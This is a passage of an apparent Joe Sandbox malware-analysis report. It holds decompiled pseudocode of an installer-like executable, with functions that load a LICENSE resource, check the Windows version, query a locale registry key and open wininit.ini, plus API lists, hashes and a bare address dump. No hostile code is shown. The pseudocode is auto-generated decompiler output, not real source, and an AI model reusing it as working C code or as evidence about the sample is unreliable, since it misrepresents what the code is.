                                                                                                                                                                                                      				return E000E6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 000E686E
                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000004A), ref: 000E68A7
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000E68CC
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,000E1140,00000000,?,?,0000000C), ref: 000E68F4
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 000E6902
                                                                                                                                                                                                        • Part of subcall function 000E66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,000E691A), ref: 000E6741
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Control Panel\Desktop\ResourceLocale, xrefs: 000E68C2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
• Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                      • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                      • API String ID: 3346862599-1109908249
                                                                                                                                                                                                      • Opcode ID: d2f3865efba2efbeba9b35da9d89e36933ce9affd41aa72397f942abe09a2a2b
                                                                                                                                                                                                      • Instruction ID: 3adf33c1a8b6ee3d31a62f83a3559069e14dfb8777d386ee2c8e1dd1ac6dfb59
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2f3865efba2efbeba9b35da9d89e36933ce9affd41aa72397f942abe09a2a2b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4331B431B402989FEB30CB12EC84BAA77BCEB557A4F000195E94DBA241DB359E85CF52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E3A3F(void* __eflags) {
                                                                                                                                                                                                      				void* _t3;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				CHAR* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t16 = "LICENSE";
                                                                                                                                                                                                      				_t1 = E000E468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                      				 *0xe8d4c = _t3;
                                                                                                                                                                                                      				if(_t3 != 0) {
                                                                                                                                                                                                      					_t19 = _t16;
                                                                                                                                                                                                      					if(E000E468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                      						if(lstrcmpA( *0xe8d4c, "<None>") == 0) {
                                                                                                                                                                                                      							LocalFree( *0xe8d4c);
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							 *0xe9124 = 0;
                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t9 = E000E6517(_t19, 0x7d1, 0, E000E3100, 0, 0);
                                                                                                                                                                                                      						LocalFree( *0xe8d4c);
                                                                                                                                                                                                      						if(_t9 != 0) {
                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xe9124 = 0x800704c7;
                                                                                                                                                                                                      						L2:
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					E000E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					LocalFree( *0xe8d4c);
                                                                                                                                                                                                      					 *0xe9124 = 0x80070714;
                                                                                                                                                                                                      					goto L2;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E000E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      				 *0xe9124 = E000E6285();
                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46A0
                                                                                                                                                                                                        • Part of subcall function 000E468F: SizeofResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46A9
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46C3
                                                                                                                                                                                                        • Part of subcall function 000E468F: LoadResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46CC
                                                                                                                                                                                                        • Part of subcall function 000E468F: LockResource.KERNEL32(00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46D3
                                                                                                                                                                                                        • Part of subcall function 000E468F: memcpy_s.MSVCRT ref: 000E46E5
                                                                                                                                                                                                        • Part of subcall function 000E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,000E2F64,?,00000002,00000000), ref: 000E3A5D
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 000E3AB3
                                                                                                                                                                                                        • Part of subcall function 000E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                        • Part of subcall function 000E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                        • Part of subcall function 000E6285: GetLastError.KERNEL32(000E5BBC), ref: 000E6285
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(<None>,00000000), ref: 000E3AD0
                                                                                                                                                                                                      • LocalFree.KERNEL32 ref: 000E3B13
                                                                                                                                                                                                        • Part of subcall function 000E6517: FindResourceA.KERNEL32(000E0000,000007D6,00000005), ref: 000E652A
                                                                                                                                                                                                        • Part of subcall function 000E6517: LoadResource.KERNEL32(000E0000,00000000,?,?,000E2EE8,00000000,000E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 000E6538
                                                                                                                                                                                                        • Part of subcall function 000E6517: DialogBoxIndirectParamA.USER32(000E0000,00000000,00000547,000E19E0,00000000), ref: 000E6557
                                                                                                                                                                                                        • Part of subcall function 000E6517: FreeResource.KERNEL32(00000000,?,?,000E2EE8,00000000,000E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 000E6560
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,000E3100,00000000,00000000), ref: 000E3AF4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$LICENSE
                                                                                                                                                                                                      • API String ID: 2414642746-383193767
                                                                                                                                                                                                      • Opcode ID: c1da54b4f0c3ed909f08e93d06ddd50bb949761018cc080f3e24c387cb315802
                                                                                                                                                                                                      • Instruction ID: ef8fde4b6faab56ea8a2b2c3915b7ee390d029393cb92f45205a01c1e0c39c86
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1da54b4f0c3ed909f08e93d06ddd50bb949761018cc080f3e24c387cb315802
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E11A5703052C1AFE7246F33AC4DE5B7EE9DBD9B50B10402EB646FE2A1DA7D88009661
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E000E24E0(void* __ebx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t7;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				long _t26;
                                                                                                                                                                                                      				signed int _t27;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 = __ebx;
                                                                                                                                                                                                      				_t7 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                      				_t25 = 0x104;
                                                                                                                                                                                                      				_t26 = 0;
                                                                                                                                                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      					E000E658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                      					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                      					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                      					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                      						_lclose(_t25);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E000E6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 000E2506
                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 000E252C
                                                                                                                                                                                                      • _lopen.KERNEL32(?,00000040), ref: 000E253B
                                                                                                                                                                                                      • _llseek.KERNEL32(00000000,00000000,00000002), ref: 000E254C
                                                                                                                                                                                                      • _lclose.KERNEL32(00000000), ref: 000E2555
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                      • String ID: wininit.ini
                                                                                                                                                                                                      • API String ID: 3273605193-4206010578
                                                                                                                                                                                                      • Opcode ID: 79ab37ec599a527b10a312a113ba4f91f6db21e0c602619e7767a241c52226be
                                                                                                                                                                                                      • Instruction ID: 04695f2b186fc08d0b3cfbecf6bf1f3c4696c876d563535e3317cd60bd32f370
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79ab37ec599a527b10a312a113ba4f91f6db21e0c602619e7767a241c52226be
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3801B5327001586BD7209B669D4CEEF7BBCDB8AB60F000155FA49F7190DE789E45CBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E000E36EE(CHAR* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                      				signed int _v420;
                                                                                                                                                                                                      				signed int _v424;
                                                                                                                                                                                                      				CHAR* _v428;
                                                                                                                                                                                                      				CHAR* _v432;
                                                                                                                                                                                                      				signed int _v436;
                                                                                                                                                                                                      				CHAR* _v440;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t72;
                                                                                                                                                                                                      				CHAR* _t77;
                                                                                                                                                                                                      				CHAR* _t91;
                                                                                                                                                                                                      				CHAR* _t94;
                                                                                                                                                                                                      				int _t97;
                                                                                                                                                                                                      				CHAR* _t98;
                                                                                                                                                                                                      				signed char _t99;
                                                                                                                                                                                                      				CHAR* _t104;
                                                                                                                                                                                                      				signed short _t107;
                                                                                                                                                                                                      				signed int _t109;
                                                                                                                                                                                                      				short _t113;
                                                                                                                                                                                                      				void* _t114;
                                                                                                                                                                                                      				signed char _t115;
                                                                                                                                                                                                      				short _t119;
                                                                                                                                                                                                      				CHAR* _t123;
                                                                                                                                                                                                      				CHAR* _t124;
                                                                                                                                                                                                      				CHAR* _t129;
                                                                                                                                                                                                      				signed int _t131;
                                                                                                                                                                                                      				signed int _t132;
                                                                                                                                                                                                      				CHAR* _t135;
                                                                                                                                                                                                      				CHAR* _t138;
                                                                                                                                                                                                      				signed int _t139;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t72 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                      				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                      				_t115 = __ecx;
                                                                                                                                                                                                      				_t135 = 0;
                                                                                                                                                                                                      				_v432 = __ecx;
                                                                                                                                                                                                      				_t138 = 0;
                                                                                                                                                                                                      				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                      					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                      					_t119 = 2;
                                                                                                                                                                                                      					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                      					__eflags = _t77;
                                                                                                                                                                                                      					if(_t77 == 0) {
                                                                                                                                                                                                      						_t119 = 0;
                                                                                                                                                                                                      						__eflags = 1;
                                                                                                                                                                                                      						 *0xe8184 = 1;
                                                                                                                                                                                                      						 *0xe8180 = 1;
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						 *0xe9a40 = _t119;
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						__eflags =  *0xe8a34 - _t138; // 0x0
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							goto L66;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _t115;
                                                                                                                                                                                                      						if(_t115 == 0) {
                                                                                                                                                                                                      							goto L66;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_v428 = _t135;
                                                                                                                                                                                                      						__eflags = _t119;
                                                                                                                                                                                                      						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                      						_t11 =  &_v420;
                                                                                                                                                                                                      						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                      						__eflags =  *_t11;
                                                                                                                                                                                                      						_v440 = _t115;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_v424 = _t135 * 0x18;
                                                                                                                                                                                                      							_v436 = E000E2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                      							_t91 = E000E2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                      							_t123 = _v436;
                                                                                                                                                                                                      							_t133 = 0x54d;
                                                                                                                                                                                                      							__eflags = _t123;
                                                                                                                                                                                                      							if(_t123 < 0) {
                                                                                                                                                                                                      								L32:
                                                                                                                                                                                                      								__eflags = _v420 - 1;
                                                                                                                                                                                                      								if(_v420 == 1) {
                                                                                                                                                                                                      									_t138 = 0x54c;
                                                                                                                                                                                                      									L36:
                                                                                                                                                                                                      									__eflags = _t138;
                                                                                                                                                                                                      									if(_t138 != 0) {
                                                                                                                                                                                                      										L40:
                                                                                                                                                                                                      										__eflags = _t138 - _t133;
                                                                                                                                                                                                      										if(_t138 == _t133) {
                                                                                                                                                                                                      											L30:
                                                                                                                                                                                                      											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                      											_t115 = 0;
                                                                                                                                                                                                      											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                      											__eflags = _t138 - _t133;
                                                                                                                                                                                                      											_t133 = _v432;
                                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                                      												_t124 = _v440;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                      												_v420 =  &_v268;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t124;
                                                                                                                                                                                                      											if(_t124 == 0) {
                                                                                                                                                                                                      												_t135 = _v436;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t99 = _t124[0x30];
                                                                                                                                                                                                      												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                      												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                      												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                      													asm("sbb ebx, ebx");
                                                                                                                                                                                                      													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t115 = 0x104;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags =  *0xe8a38 & 0x00000001;
                                                                                                                                                                                                      											if(( *0xe8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                      												L64:
                                                                                                                                                                                                      												_push(0);
                                                                                                                                                                                                      												_push(0x30);
                                                                                                                                                                                                      												_push(_v420);
                                                                                                                                                                                                      												_push("cent");
                                                                                                                                                                                                      												goto L65;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												__eflags = _t135;
                                                                                                                                                                                                      												if(_t135 == 0) {
                                                                                                                                                                                                      													goto L64;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												__eflags =  *_t135;
                                                                                                                                                                                                      												if( *_t135 == 0) {
                                                                                                                                                                                                      													goto L64;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												MessageBeep(0);
                                                                                                                                                                                                      												_t94 = E000E681F(_t115);
                                                                                                                                                                                                      												__eflags = _t94;
                                                                                                                                                                                                      												if(_t94 == 0) {
                                                                                                                                                                                                      													L57:
                                                                                                                                                                                                      													0x180030 = 0x30;
                                                                                                                                                                                                      													L58:
                                                                                                                                                                                                      													_t97 = MessageBoxA(0, _t135, "cent", 0x00180030 | _t115);
                                                                                                                                                                                                      													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                      													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                      														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                      														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                      															goto L66;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														__eflags = _t97 - 1;
                                                                                                                                                                                                      														L62:
                                                                                                                                                                                                      														if(__eflags == 0) {
                                                                                                                                                                                                      															_t138 = 0;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														goto L66;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													__eflags = _t97 - 6;
                                                                                                                                                                                                      													goto L62;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t98 = E000E67C9(_t124, _t124);
                                                                                                                                                                                                      												__eflags = _t98;
                                                                                                                                                                                                      												if(_t98 == 0) {
                                                                                                                                                                                                      													goto L57;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L58;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                      										if(_t138 == 0x54c) {
                                                                                                                                                                                                      											goto L30;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t138;
                                                                                                                                                                                                      										if(_t138 == 0) {
                                                                                                                                                                                                      											goto L66;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t135 = 0;
                                                                                                                                                                                                      										__eflags = 0;
                                                                                                                                                                                                      										goto L44;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									L37:
                                                                                                                                                                                                      									_t129 = _v432;
                                                                                                                                                                                                      									__eflags = _t129[0x7c];
                                                                                                                                                                                                      									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                      										goto L66;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t133 =  &_v268;
                                                                                                                                                                                                      									_t104 = E000E28E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                      									__eflags = _t104;
                                                                                                                                                                                                      									if(_t104 != 0) {
                                                                                                                                                                                                      										goto L66;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t135 = _v428;
                                                                                                                                                                                                      									_t133 = 0x54d;
                                                                                                                                                                                                      									_t138 = 0x54d;
                                                                                                                                                                                                      									goto L40;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t91;
                                                                                                                                                                                                      							if(_t91 > 0) {
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t123;
                                                                                                                                                                                                      							if(_t123 != 0) {
                                                                                                                                                                                                      								__eflags = _t91;
                                                                                                                                                                                                      								if(_t91 != 0) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                      								L27:
                                                                                                                                                                                                      								if(__eflags <= 0) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								L28:
                                                                                                                                                                                                      								__eflags = _t135;
                                                                                                                                                                                                      								if(_t135 == 0) {
                                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t138 = 0x54c;
                                                                                                                                                                                                      								goto L30;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t91;
                                                                                                                                                                                                      							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                      							if(_t91 != 0) {
                                                                                                                                                                                                      								_t131 = _v424;
                                                                                                                                                                                                      								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                      								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                      							_t109 = _v424;
                                                                                                                                                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                      							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                      							goto L27;
                                                                                                                                                                                                      							L33:
                                                                                                                                                                                                      							_t135 =  &(_t135[1]);
                                                                                                                                                                                                      							_v428 = _t135;
                                                                                                                                                                                                      							_v420 = _t135;
                                                                                                                                                                                                      							__eflags = _t135 - 2;
                                                                                                                                                                                                      						} while (_t135 < 2);
                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t77 == 1;
                                                                                                                                                                                                      					if(_t77 == 1) {
                                                                                                                                                                                                      						 *0xe9a40 = _t119;
                                                                                                                                                                                                      						 *0xe8184 = 1;
                                                                                                                                                                                                      						 *0xe8180 = 1;
                                                                                                                                                                                                      						__eflags = _t133 - 3;
                                                                                                                                                                                                      						if(_t133 > 3) {
                                                                                                                                                                                                      							__eflags = _t133 - 5;
                                                                                                                                                                                                      							if(_t133 < 5) {
                                                                                                                                                                                                      								goto L14;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t113 = 3;
                                                                                                                                                                                                      							_t119 = _t113;
                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t119 = 1;
                                                                                                                                                                                                      						_t114 = 3;
                                                                                                                                                                                                      						 *0xe9a40 = 1;
                                                                                                                                                                                                      						__eflags = _t133 - _t114;
                                                                                                                                                                                                      						if(__eflags < 0) {
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							 *0xe8184 = _t135;
                                                                                                                                                                                                      							 *0xe8180 = _t135;
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                      						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t138 = 0x4ca;
                                                                                                                                                                                                      					goto L44;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t138 = 0x4b4;
                                                                                                                                                                                                      					L44:
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					_push(0x10);
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					_push(_t135);
                                                                                                                                                                                                      					L65:
                                                                                                                                                                                                      					_t133 = _t138;
                                                                                                                                                                                                      					E000E44B9(0, _t138);
                                                                                                                                                                                                      					L66:
                                                                                                                                                                                                      					return E000E6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





































                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e37d5
                                                                                                                                                                                                      0x000e37db
                                                                                                                                                                                                      0x000e37e8
                                                                                                                                                                                                      0x000e37ea
                                                                                                                                                                                                      0x000e37ea
                                                                                                                                                                                                      0x000e37ea
                                                                                                                                                                                                      0x000e37f0
                                                                                                                                                                                                      0x000e37f6
                                                                                                                                                                                                      0x000e3805
                                                                                                                                                                                                      0x000e3817
                                                                                                                                                                                                      0x000e382b
                                                                                                                                                                                                      0x000e3830
                                                                                                                                                                                                      0x000e3836
                                                                                                                                                                                                      0x000e383b
                                                                                                                                                                                                      0x000e383d
                                                                                                                                                                                                      0x000e38eb
                                                                                                                                                                                                      0x000e38eb
                                                                                                                                                                                                      0x000e38f2
                                                                                                                                                                                                      0x000e390c
                                                                                                                                                                                                      0x000e3911
                                                                                                                                                                                                      0x000e3911
                                                                                                                                                                                                      0x000e3913
                                                                                                                                                                                                      0x000e394d
                                                                                                                                                                                                      0x000e394d
                                                                                                                                                                                                      0x000e394f
                                                                                                                                                                                                      0x000e38a9
                                                                                                                                                                                                      0x000e38a9
                                                                                                                                                                                                      0x000e38b0
                                                                                                                                                                                                      0x000e38b2
                                                                                                                                                                                                      0x000e38b9
                                                                                                                                                                                                      0x000e38bb
                                                                                                                                                                                                      0x000e38c1
                                                                                                                                                                                                      0x000e3975
                                                                                                                                                                                                      0x000e38c7
                                                                                                                                                                                                      0x000e38de
                                                                                                                                                                                                      0x000e38e0
                                                                                                                                                                                                      0x000e38e0
                                                                                                                                                                                                      0x000e397b
                                                                                                                                                                                                      0x000e397d
                                                                                                                                                                                                      0x000e39a9
                                                                                                                                                                                                      0x000e397f
                                                                                                                                                                                                      0x000e3982
                                                                                                                                                                                                      0x000e398b
                                                                                                                                                                                                      0x000e398d
                                                                                                                                                                                                      0x000e398f
                                                                                                                                                                                                      0x000e399f
                                                                                                                                                                                                      0x000e39a1
                                                                                                                                                                                                      0x000e3991
                                                                                                                                                                                                      0x000e3991
                                                                                                                                                                                                      0x000e3991
                                                                                                                                                                                                      0x000e398f
                                                                                                                                                                                                      0x000e39af
